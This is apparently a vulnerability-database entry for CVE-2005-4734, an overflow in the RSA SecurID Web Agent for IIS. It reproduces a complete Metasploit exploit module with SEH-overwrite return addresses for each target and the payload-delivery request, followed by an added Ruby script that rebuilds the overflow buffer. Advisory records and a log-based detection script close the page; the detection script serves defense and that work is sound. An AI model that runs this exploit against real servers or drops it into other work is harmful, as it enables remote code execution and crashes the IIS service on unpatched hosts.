Microsoft IIS ISAPI RSA WebAgent Redirect Overflow
2005-12-26T14:34:22
ID: MSF:EXPLOIT/WINDOWS/ISAPI/RSA_WEBAGENT_REDIRECT
Type: metasploit
Reporter: Rapid7
Modified: 2017-07-24T13:26:21
Description
This module exploits a stack buffer overflow in the SecurID Web Agent for IIS (IISWebAgentIF.dll), reached through an over-long url parameter to the agent's Redirect method. The ISAPI filter runs in-process with inetinfo.exe, so any attempt to exploit this flaw, whether or not it succeeds, terminates the IIS process and, depending on configuration, triggers a restart of the service.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Microsoft IIS ISAPI RSA WebAgent Redirect Overflow',
      'Description' => %q{
        This module exploits a stack buffer overflow in the SecurID Web
        Agent for IIS. This ISAPI filter runs in-process with
        inetinfo.exe, so any attempt to exploit this flaw will result
        in the termination and potential restart of the IIS service.
      },
      'Author'      => [ 'hdm' ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['CVE', '2005-4734'],
          ['OSVDB', '20151'],
        ],
      'Privileged'  => false,
      'Payload'     =>
        {
          'Space'           => 1024,
          # The buffer travels as a query-string value, so NUL, whitespace,
          # the URL delimiters (" # % & ' + / : ; < = > ? @ \) and 'Z'/'z'
          # must not appear in the encoded payload.
          'BadChars'        => "\x00\x09\x0a\x0b\x0d\x20\x22\x23\x25\x26\x27\x2b\x2f" +
            (0x3a..0x3f).to_a.pack('C*') + "\x40\x5c" + "Zz",
          'StackAdjustment' => -3500,
        },
      'Platform'    => 'win',
      'Targets'     =>
        [
          # 'Rets' => [ offset of the SEH handler slot in the url value, handler address ]
          # Version-specific return addresses
          ['RSA WebAgent 5.2', { 'Rets' => [ 996, 0x1001e694 ] }],
          ['RSA WebAgent 5.3', { 'Rets' => [ 992, 0x10010e89 ] }],

          # Generic return addresses
          ['RSA WebAgent 5.2 on Windows 2000 English', { 'Rets' => [ 996, 0x75022ac4 ] }],
          ['RSA WebAgent 5.3 on Windows 2000 English', { 'Rets' => [ 992, 0x75022ac4 ] }],

          ['RSA WebAgent 5.2 on Windows XP SP0-SP1 English', { 'Rets' => [ 996, 0x71ab1d54 ] }],
          ['RSA WebAgent 5.3 on Windows XP SP0-SP1 English', { 'Rets' => [ 992, 0x71ab1d54 ] }],

          ['RSA WebAgent 5.2 on Windows XP SP2 English', { 'Rets' => [ 996, 0x71ab9372 ] }],
          ['RSA WebAgent 5.3 on Windows XP SP2 English', { 'Rets' => [ 992, 0x71ab9372 ] }],

          ['RSA WebAgent 5.2 on Windows 2003 English SP0', { 'Rets' => [ 996, 0x7ffc0638 ] }],
          ['RSA WebAgent 5.3 on Windows 2003 English SP0', { 'Rets' => [ 992, 0x7ffc0638 ] }],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Oct 21 2005'))

    register_options(
      [
        OptString.new('URL', [ true, "The path to IISWebAgentIF.dll", "/WebID/IISWebAgentIF.dll" ]),
      ])
  end

  # Probe the agent's GetPic handler; the response body names the product
  # when the filter is installed at the configured path.
  def check
    r = send_request_raw({
      'uri'   => normalize_uri(datastore['URL']),
      'query' => 'GetPic?image=msf'
    }, -1)

    if (r and r.body and r.body =~ /RSA Web Access Authentication/)
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    # 8 KiB of alphanumeric filler with digits and Z/z replaced by 'A'.
    pat = rand_text_alphanumeric(8192).gsub(/\d|Z/i, 'A') # HACK

    # SEH record (next-SEH + handler address) followed by the encoded payload,
    # pasted so that the handler address lands at Rets[0].
    seh = generate_seh_payload(target['Rets'][1])
    pat[target['Rets'][0]-4, seh.length] = seh

    # The overflow is reached via GET <URL>?Redirect?url=<pat>; a 5-second
    # timeout is enough because the process dies rather than answering.
    r = send_request_raw({
      'uri'   => normalize_uri(datastore['URL']),
      'query' => 'Redirect?url=' + pat
    }, 5)

    handler
    disconnect
  end
end
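Added example, not part of the module above or of Metasploit: a stand-alone Ruby reconstruction of what the exploit method sends, so the layout can be inspected offline. It rebuilds the filler, pastes the SEH record at 'Rets'[0]-4 as the module does, screens every handler address in the target table against the module's BadChars, and mirrors the banner test in check. The 8-byte SEH record layout (a short forward jump in the next-SEH slot, then the little-endian handler address, then the payload) is an assumption about what generate_seh_payload emits; the payload bytes are a placeholder.

```ruby
# Bytes the module declares unusable in the url value ('BadChars').
BAD_CHARS = ("\x00\x09\x0a\x0b\x0d\x20\x22\x23\x25\x26\x27\x2b\x2f".b +
             (0x3a..0x3f).to_a.pack('C*') +
             "\x40\x5c".b + "Zz".b).bytes.freeze

# [offset of the SEH handler slot, handler address], copied from 'Rets'.
TARGETS = {
  'RSA WebAgent 5.2'                                => [996, 0x1001e694],
  'RSA WebAgent 5.3'                                => [992, 0x10010e89],
  'RSA WebAgent 5.2 on Windows 2000 English'        => [996, 0x75022ac4],
  'RSA WebAgent 5.3 on Windows 2000 English'        => [992, 0x75022ac4],
  'RSA WebAgent 5.2 on Windows XP SP0-SP1 English'  => [996, 0x71ab1d54],
  'RSA WebAgent 5.3 on Windows XP SP0-SP1 English'  => [992, 0x71ab1d54],
  'RSA WebAgent 5.2 on Windows XP SP2 English'      => [996, 0x71ab9372],
  'RSA WebAgent 5.3 on Windows XP SP2 English'      => [992, 0x71ab9372],
  'RSA WebAgent 5.2 on Windows 2003 English SP0'    => [996, 0x7ffc0638],
  'RSA WebAgent 5.3 on Windows 2003 English SP0'    => [992, 0x7ffc0638],
}.freeze

ALNUM = (('a'..'z').to_a + ('A'..'Z').to_a + ('0'..'9').to_a).freeze

# Same filler the module builds: random alphanumerics, then every digit and
# Z/z replaced with 'A' (the module labels this step a HACK).
def filler(len)
  Array.new(len) { ALNUM.sample }.join.gsub(/\d|Z/i, 'A')
end

# First byte of buf that the module lists as bad, or nil when buf is clean.
def first_bad_char(buf)
  buf.b.each_byte.find { |b| BAD_CHARS.include?(b) }
end

# Assumed 8-byte SEH record: next-SEH = jmp short +6 (skips the handler slot),
# SEH = handler address, little-endian.
def seh_record(handler_addr)
  "\xeb\x06AA".b + [handler_addr].pack('V')
end

# The url value: filler with record+payload pasted at offset-4, so the
# handler address sits exactly at offset and the payload at offset+4.
def build_url_param(offset, handler_addr, payload)
  pat = filler(8192).b
  rec = seh_record(handler_addr) + payload.b
  pat[offset - 4, rec.length] = rec
  pat
end

# Bytes left for the payload after the record, against the module's Space.
def payload_space(offset)
  8192 - (offset + 4)
end

# Request line as send_request_raw('uri' => path, 'query' => ...) forms it.
def request_line(path, param)
  "GET #{path}?Redirect?url=#{param} HTTP/1.1"
end

# Mirrors the check method: the GetPic response body names the product.
def agent_present?(body)
  !!(body =~ /RSA Web Access Authentication/)
end

# Targets whose handler address survives the url parser byte for byte.
def targets_with_clean_ret
  TARGETS.select { |_, (_, addr)| first_bad_char([addr].pack('V')).nil? }.keys
end
```

The screen matters because the handler address is sent as four raw bytes inside a query-string value: a byte such as 0x25 ('%'), 0x2b ('+') or 0x26 ('&') would be consumed or rewritten by URL parsing before the filter copies it. All ten addresses in the target table pass. Note that 0x7ffc0638 contains 0x38, an ASCII digit; the module's gsub runs on the filler before the record is pasted in, so that byte is not disturbed. Why Z and z are excluded is not explained anywhere on this page.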
Source: https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/isapi/rsa_webagent_redirect.rb
CVSS v2: 6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P)
References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4734
Related records: CVE-2005-4734, OSVDB:20151, SAINT:AB1003DFB2C2323D03E96320CB2ABA67, SAINT:E4BAD748E9823F328D88BBC8EF3671A1, SAINT:C6E42A7A2EC76121A40444C490E607A9, PACKETSTORM:83040, EDB-ID:16358
Last seen: 2020-06-23T22:23:08
Related records

CVE-2005-4734 (NVD, published 2005-12-31, last modified 2008-09-05)
Stack-based buffer overflow in IISWebAgentIF.dll in RSA Authentication Agent for Web (aka SecurID Web Agent) 5.2 and 5.3 for IIS allows remote attackers to execute arbitrary code via a long url parameter in the Redirect method.
CVSS v2: 6.4 MEDIUM (AV:N/AC:L/Au:N/C:N/I:P/A:P), exploitability 10.0, impact 4.9; CWE: NVD-CWE-Other
Affected: cpe:/a:rsa:authentication_agent_for_web:5.2, cpe:/a:rsa:authentication_agent_for_web:5.3
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4734

SAINT: RSA SecurID Web Agent for IIS redirect buffer overflow (added 2005-11-30)
Background: RSA SecurID Web Agent for IIS (http://www.rsasecurity.com/node.asp?id=2807) provides access control for IIS web servers using one-time authentication tokens.
Problem: A buffer overflow in IISWebAgentIF.dll could allow a remote attacker to execute arbitrary commands using a long, specially crafted url parameter in a Redirect request.
Resolution: Fixes are available from RSA SecurCare Online (http://knowledge.rsasecurity.com).
Limitations: Web Agent for IIS must be configured correctly in order for this exploit to work.
Platforms: Windows 2000
References: BID 26424 (http://www.securityfocus.com/bid/26424), OSVDB 20151 (http://www.osvdb.org/20151), http://secunia.com/advisories/17281/
The same entry is carried under three IDs: SAINT:C6E42A7A2EC76121A40444C490E607A9 (http://www.saintcorporation.com/cgi-bin/exploit_info/rsa_auth_agent_redirect), SAINT:E4BAD748E9823F328D88BBC8EF3671A1 (http://download.saintcorporation.com/cgi-bin/exploit_info/rsa_auth_agent_redirect) and SAINT:AB1003DFB2C2323D03E96320CB2ABA67 (https://my.saintcorporation.com/cgi-bin/exploit_info/rsa_auth_agent_redirect).

Exploit-DB: EDB-ID:16358, "Microsoft IIS ISAPI RSA WebAgent Redirect Overflow", remote exploit for the Windows platform, published 2010-09-20
https://www.exploit-db.com/exploits/16358/ (download: https://www.exploit-db.com/download/16358/)
This is the 2010 revision of the module above ($Id: rsa_webagent_redirect.rb 10394 2010-09-20 08:06:27Z jduck $, class Metasploit3). It differs from the current source in passing datastore['URL'] to send_request_raw without normalize_uri and in returning Exploit::CheckCode::Detected rather than Appears from check.

Packet Storm: PACKETSTORM:83040, "Microsoft IIS ISAPI RSA WebAgent Redirect Overflow", published 2009-11-26
https://packetstormsecurity.com/files/83040/Microsoft-IIS-ISAPI-RSA-WebAgent-Redirect-Overflow.html (download: https://packetstormsecurity.com/files/download/83040/rsa_webagent_redirect.rb.txt)
An earlier revision of the same module: no Rank, no DisclosureDate, the BadChars list spelled out byte by byte, and the same datastore['URL'] / CheckCode::Detected behaviour as the Exploit-DB copy.

OSVDB 20151: RSA Authentication Agent for Web IISWebAgentIF.dll Redirect Overflow (2005-10-21)
Vulnerability description: A remote overflow exists in RSA Authentication Agent for Web for IIS. IISWebAgentIF.dll fails to validate the length of the "url" parameter in the "Redirect" method, resulting in a stack-based buffer overflow. With a specially crafted GET request, an attacker can cause arbitrary code execution resulting in a loss of integrity.
Technical description: RSA Authentication Agent for Web for IIS is an ISAPI filter which runs in-process with inetinfo.exe. Any attempt to exploit this flaw will result in the termination and potential restart of the IIS service.
Solution description: Currently, there are no known workarounds or upgrades to correct this issue. However, RSA Security has reportedly released a patch to address this vulnerability.
References: Vendor URL http://rsasecurity.com/; vendor solution https://knowledge.rsasecurity.com/dlcpages/rsa_securid/securid_dlc_aaweb.asp; Secunia Advisory 17281 (https://secuniaresearch.flexerasoftware.com/advisories/17281/); generic exploit URL http://www.metasploit.com/projects/Framework/exploits.html#rsa_iiswebagent_redirect; https://vulners.com/osvdb/OSVDB:20151
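Added example, not taken from the module or from any of the advisories above: detection logic for the two request shapes this module produces, run over IIS W3C extended log lines. The check method issues GetPic?image=msf against IISWebAgentIF.dll, and the exploit method sends Redirect?url= followed by 8192 bytes; both are visible in cs-uri-stem and cs-uri-query. The log lines are constructed for this example, the column order is read from the log's own #Fields: header, and the 1024-byte threshold is an assumption about how long a legitimate redirect target can be.

```ruby
# Constructed sample of an IIS 6.0 W3C log (not a real capture). IIS writes
# one request per line and encodes spaces inside field values as '+'.
SAMPLE_LOG = <<~LOG
  #Software: Microsoft Internet Information Services 6.0
  #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) sc-status
  2005-10-21 10:15:01 10.0.0.5 GET /WebID/IISWebAgentIF.dll GetPic?image=logo 80 10.0.0.40 Mozilla/4.0 200
  2005-10-21 10:15:07 10.0.0.5 GET /WebID/IISWebAgentIF.dll GetPic?image=msf 80 192.0.2.10 - 200
  2005-10-21 10:15:09 10.0.0.5 GET /WebID/IISWebAgentIF.dll Redirect?url=#{'A' * 8192} 80 192.0.2.10 - 500
  2005-10-21 10:15:12 10.0.0.5 GET /WebID/IISWebAgentIF.dll Redirect?url=/protected/index.html 80 10.0.0.41 Mozilla/4.0 302
LOG

# Assumption: a genuine Redirect target is far shorter than this; the module
# always sends 8192 bytes.
REDIRECT_URL_MAX = 1024

# Parse W3C extended format into one Hash per request, keyed by the names
# in the most recent #Fields: directive. Lines whose column count does not
# match the header are dropped rather than misaligned.
def parse_w3c(text)
  fields = nil
  rows = []
  text.each_line do |raw|
    line = raw.chomp
    if line.start_with?('#Fields:')
      fields = line.delete_prefix('#Fields:').split
      next
    end
    next if fields.nil? || line.empty? || line.start_with?('#')
    values = line.split(' ')
    next unless values.length == fields.length
    rows << fields.zip(values).to_h
  end
  rows
end

# Reason string when a row looks like this module's traffic, else nil.
def alert_reason(row)
  return nil unless row['cs-uri-stem'].to_s =~ /IISWebAgentIF\.dll\z/i
  query = row['cs-uri-query'].to_s
  if (m = query.match(/\ARedirect\?url=(.*)\z/i)) && m[1].length > REDIRECT_URL_MAX
    "oversized Redirect url parameter (#{m[1].length} bytes)"
  elsif query.match?(/\AGetPic\?image=msf\z/i)
    'Metasploit check probe (GetPic?image=msf)'
  end
end

# Every flagged request with the fields an analyst needs for triage.
def find_alerts(text)
  parse_w3c(text).each_with_object([]) do |row, alerts|
    reason = alert_reason(row)
    next unless reason
    alerts << { time: "#{row['date']} #{row['time']}", client: row['c-ip'],
                status: row['sc-status'], reason: reason }
  end
end

if __FILE__ == $PROGRAM_NAME
  find_alerts(SAMPLE_LOG).each { |a| puts "#{a[:time]} #{a[:client]} #{a[:status]} #{a[:reason]}" }
end
```

Because the filter runs inside inetinfo.exe, the request that triggers the overflow may never be written: the process that would log it is the one that terminates. In practice the GetPic?image=msf probe, which completes normally, is the more dependable trace of this specific module, and the length rule should be paired with whatever service-restart telemetry the host keeps for IIS.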